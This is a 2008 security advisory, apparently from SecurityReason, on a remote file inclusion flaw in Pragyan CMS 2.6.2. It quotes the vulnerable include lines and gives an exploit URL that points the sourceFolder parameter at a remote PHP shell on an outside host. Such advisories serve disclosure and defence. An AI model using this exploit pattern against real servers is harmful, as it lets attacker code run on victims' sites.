Topic : | Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
|
SecurityAlert : 4010
CVE : CVE-2008-3207
CWE : CWE-94
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : N3TR00T3R
Published : 20.07.2008
Affected Software : | Sahil Ahuja, Pragyan_cms, 2.6.2 |
 Advisory Content : << In The Name Of GOD >>
-------------------------------------------------------------
- [ Persian Boys Hacking Team ] -:- 2008
-
- discovered by N3TR00T3R [at] Y! [dot] com
- pragyan 2.6.2 Remote File Includion
- download
:http://sourceforge.net/project/showfiles.php?group_id=220286
- sp tnx :
Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd
r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser
Zahacker,goli_boya,i_reza_i,programer, and
all irchatan members ...
[www.Persian-Boys.com] & [www.irchatan.com]
--------------------------------------------------------------
if register_globals = On;
Vul Code : [/cms/modules/form.lib.php]
##########################################################
#global $sourceFolder;
#global $moduleFolder;
#require_once("$sourceFolder/$moduleFolder/form/editform.php");
#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");
#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.ph
p");
#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php"
);
#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");
##########################################################
Exploit :
##########################################################
#
#
www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3
r.by.ru/syn99.php?
#
##########################################################
References :
http://securityreason.com/expldownload/1/4343/1 (Exploit)
http://xforce.iss.net/xforce/xfdb/43777
http://www.securityfocus.com/bid/30235
http://www.milw0rm.com/exploits/6078
http://secunia.com/advisories/31101
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|